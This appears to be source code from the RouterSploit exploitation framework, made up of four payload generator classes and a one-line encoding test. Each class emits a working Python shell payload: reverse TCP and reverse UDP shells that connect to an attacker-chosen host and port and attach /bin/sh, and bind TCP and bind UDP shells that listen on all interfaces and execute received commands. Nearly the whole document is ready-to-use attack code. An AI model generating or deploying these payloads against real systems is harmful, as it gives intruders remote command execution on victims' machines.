class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = {
"name": "Python Reverse TCP",
"description":
"Creates interactive tcp reverse shell by using python.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self):
return ("import socket,subprocess,os\n" +
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
"os.dup2(s.fileno(),0)\n" + "os.dup2(s.fileno(),1)\n" +
"os.dup2(s.fileno(),2)\n" +
"p=subprocess.call([\"/bin/sh\",\"-i\"])")
class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = {
"name": "Python Bind TCP",
"description": "Creates interactive tcp bind shell by using python.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self):
return ("import socket,os\n" +
"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"so.bind(('0.0.0.0',{}))\n".format(self.rport) +
"so.listen(1)\n" + "so,addr=so.accept()\n" + "x=False\n" +
"while not x:\n" + "\tdata=so.recv(1024)\n" +
"\tstdin,stdout,stderr,=os.popen3(data)\n" +
"\tstdout_value=stdout.read()+stderr.read()\n" +
"\tso.send(stdout_value)\n")
class Payload(ReverseTCPPayloadMixin, GenericPayload):
__info__ = {
"name":
"Python Reverse UDP",
"description":
"Creates interactive udp reverse shell by using python.",
"authors": (
"Andre Marques (zc00l)", # shellpop
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
),
}
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self):
return ("import os\n" + "import pty\n" + "import socket\n" +
"s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n" +
"s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
"os.dup2(s.fileno(), 0)\n" + "os.dup2(s.fileno(), 1)\n" +
"os.dup2(s.fileno(), 2)\n" + "pty.spawn('/bin/sh');\n" +
"s.close()\n")
class Payload(BindTCPPayloadMixin, GenericPayload):
__info__ = {
"name":
"Python Bind UDP",
"description":
"Creates interactive udp bind shell by using python.",
"authors": (
"Andre Marques (zc00l)", # shellpop
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
architecture = Architectures.PYTHON
encoder = OptString(Encoder(), "Encoder")
def generate(self):
return (
"from subprocess import Popen,PIPE\n" +
"from socket import socket, AF_INET, SOCK_DGRAM\n" +
"s=socket(AF_INET,SOCK_DGRAM)\n" +
"s.bind(('0.0.0.0',{}))\n".format(self.rport) + "while 1:\n"
"\tdata,addr=s.recvfrom(1024)\n" +
"\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n"
+ "\ts.sendto(''.join([out[0],out[1]]),addr)\n")
def test_payload_enconding():
""" Test scenario - payload encoding """
encoder = Encoder()
assert encoder.encode(bind_tcp) == bind_tcp_encoded